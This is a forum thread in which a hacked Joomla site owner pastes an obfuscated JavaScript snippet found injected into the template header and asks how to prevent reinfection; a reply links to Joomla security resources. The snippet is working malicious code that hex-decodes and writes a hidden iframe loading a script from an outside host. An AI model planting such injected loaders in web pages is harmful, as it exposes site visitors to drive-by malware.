My site was hacked
-
-
- Martin
- Jr. Rocketeer
- Posts: 43
- Thanks: 0
-
Someone on the joomla support forum said that this script i found in my header was malicious. i had a complaint from a user that the site had a virus. and i did find this script in the <head>:
<script type="text/javascript">
function BFD6F5DD5DB451E605DC93C1C(F856A149343E267113D4743C9CC){var BABAC8D053646DAAEED97=16;return(parseInt(F856A149343E267113D4743C9CC,BABAC8D053646DAAEED97));}function EDC04E5FA7431499C99(AF1EAFAE6DA9EFFC64209858078EBFBC){function FDB6EFBD03C6DE29(){var A22AFFBCBE863863A1B64DF=2;return A22AFFBCBE863863A1B64DF;}var A01766E6154626B4="";for(E846AAB0F24560E5FDD=0;E846AAB0F24560E5FDD<AF1EAFAE6DA9EFFC64209858078EBFBC.length;E846AAB0F24560E5FDD+=FDB6EFBD03C6DE29()){A01766E6154626B4+=(String.fromCharCode(BFD6F5DD5DB451E605DC93C1C(AF1EAFAE6DA9EFFC64209858078EBFBC.substr(E846AAB0F24560E5FDD,FDB6EFBD03C6DE29()))));}document.write(A01766E6154626B4);}EDC04E5FA7431499C99("3C696672616D65207372633D22687474703A2F2F7878786D6F766965732E6469702E6A702F31352F6A735F676F5F66312E706870222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
</script>
I know how to delete it from the index.php file in the template folder. but how can i prevent from happening again?
thanks!
-
-
-
- Ben Lee
- Elite Rocketeer
- Posts: 4193
- Thanks: 42
-
I'm going to throw a couple links at you that may help you out in the future. I'm not a security expert so I rely heavily on this information.
Joomla Security Checklist
Joomla Security Forum
You can even be kept up-to-date with know vulnerabilities as Joomla finds them through feeds on this page:
Joomla Security News
I know it's a lot to throw out there, but following those steps in the checklist should help greatly.
-
Time to create page: 0.088 seconds